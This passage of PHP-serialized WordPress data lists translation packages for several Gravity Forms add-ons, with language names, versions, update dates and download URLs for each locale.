(Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:35:03+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:35:06+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:20:\"gravityformsicontact\";a:1:{s:12:\"translations\";a:18:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T17:35:19+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-05T12:40:54+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-06-27T08:34:13+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:45+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T17:35:34+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-10-21T13:33:56+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-05T12:39:50+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T17:35:40+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T17:35:43+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T17:35:49+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-03-14T17:52:22+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T17:36:01+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T17:36:04+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-12-17T14:06:18+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-05T12:40:11+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T17:35:31+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2021-08-02T17:34:13+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T17:36:17+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsicontact/gravityformsicontact-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:24:\"gravityformsemailoctopus\";a:1:{s:12:\"translations\";a:18:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:36:38+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2020-06-23T13:15:59+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2022-06-27T08:34:13+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2022-06-27T08:55:23+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:36:53+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:108:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2020-10-21T15:28:15+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:36:42+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2020-06-23T13:15:54+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2020-06-23T13:15:56+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:37:07+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-03-14T17:47:59+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:108:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:37:20+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:37:22+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2020-06-23T13:16:02+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2020-06-23T13:16:03+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:36:50+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:37:32+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:37:34+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsemailoctopus/gravityformsemailoctopus-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:19:\"gravityformsmailgun\";a:1:{s:12:\"translations\";a:20:{s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T10:02:12+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:02:23+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:38:24+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T08:34:13+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T10:01:47+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:02:33+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-03-02T20:46:07+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-10-21T11:48:43+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:37:49+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:38:07+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:38:08+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:38:15+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-12-17T14:49:05+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-09-14T09:47:07+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-12-17T15:01:51+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-12-17T15:53:35+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:38:33+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:37:57+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:38:37+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-11-05T09:42:12+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmailgun/gravityformsmailgun-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:20:\"gravityformssendgrid\";a:1:{s:12:\"translations\";a:21:{s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-06-23T19:14:16+00:00\";s:12:\"english_name\";s:15:\"Chinese 